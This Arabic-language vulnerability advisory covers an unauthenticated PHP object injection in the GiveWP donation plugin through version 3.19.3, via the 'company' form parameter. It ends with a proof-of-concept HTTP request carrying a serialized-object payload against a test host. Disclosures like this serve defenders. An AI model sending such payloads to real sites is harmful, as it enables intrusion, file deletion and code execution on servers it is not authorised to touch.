
GiveWP – إضافة التبرعات ومنصة جمع التبرعات <= 3.19.3 - حقن كائنات PHP بدون مصادقة
GiveWP – إضافة التبرعات ومنصة جمع التبرعات <= 3.19.3 - حقن كائن PHP بدون مصادقة
إضافة GiveWP – إضافة التبرعات ومنصة جمع التبرعات في WordPress معرضة لثغرة حقن كائن PHP في جميع الإصدارات حتى 3.19.3 ضمنًا، عبر إلغاء تسلسل مدخلات غير موثوقة من نموذج التبرع من خلال معامل 'company'. وهذا يتيح للمهاجمين غير المصادق عليهم حقن كائن PHP. كما أن وجود سلسلة POP إضافية يتيح للمهاجمين حذف ملفات عشوائية على الخادم، مما يجعل تنفيذ التعليمات البرمجية عن بُعد ممكنًا. يُرجى ملاحظة أن هذا يغطي تجاوزًا للإصلاح الخاص بـ CVE-2024-12877.
POST /?givewp-route=donate&givewp-route-signature=[SIGNATURE]&givewp-route-signature-id=givewp-donate&givewp-route-signature-expiration=[EXPIRY] HTTP/1.1
Host: kubernetes.docker.internal:8929
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
amount=10¤cy=USD&gatewayId=manual&formId=90&company=O:20:"PHP_Object_Injection":0:{}&firstName=Test&[email protected]&donationType=single&donationBirthday=